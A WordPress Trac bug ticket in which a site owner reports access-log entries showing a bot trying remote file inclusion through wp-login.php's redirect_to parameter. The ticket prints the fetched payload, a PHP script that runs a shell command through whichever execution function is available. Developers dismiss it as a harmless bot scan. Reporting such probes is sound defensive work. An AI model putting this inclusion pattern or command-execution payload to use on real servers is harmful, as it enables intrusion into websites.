WordPress.org

Make WordPress Core

Opened 6 years ago

Closed 6 years ago

#5548 closed defect (bug) (invalid)

Hacking attempt.

Reported by: mylesab Owned by:
Milestone: Priority: normal
Severity: normal Version:
Component: Security Keywords:
Focuses: Cc:

Description

Today I noticed the following entries in my log:

80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET /blog/archives/2006/microid-wordpress-plugin//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2066 "-" "libwww-perl/5.805"
80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET //wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2015 "-" "libwww-perl/5.805"
80.238.208.61 - - [29/Dec/2007:12:18:15 -0600] "GET /blog/archives/2006//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2041 "-" "libwww-perl/5.805"

When I curl the id.txt file I got the following:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Change History (2)

comment:1 ryan6 years ago

Not sure what they're trying to accomplish with this. redirect_to doesn't do an include. Also, we block attempts to launder links through redirect_to.

comment:2 JeremyVisser6 years ago

  • Milestone 2.5 deleted
  • Resolution set to invalid
  • Status changed from new to closed

This is not really a proper bug report, nor anything that should concern WordPress users. All WP blogs get hammered by useless $cript k1dd1e bots that really don't get anywhere.

Note: See TracTickets for help on using tickets.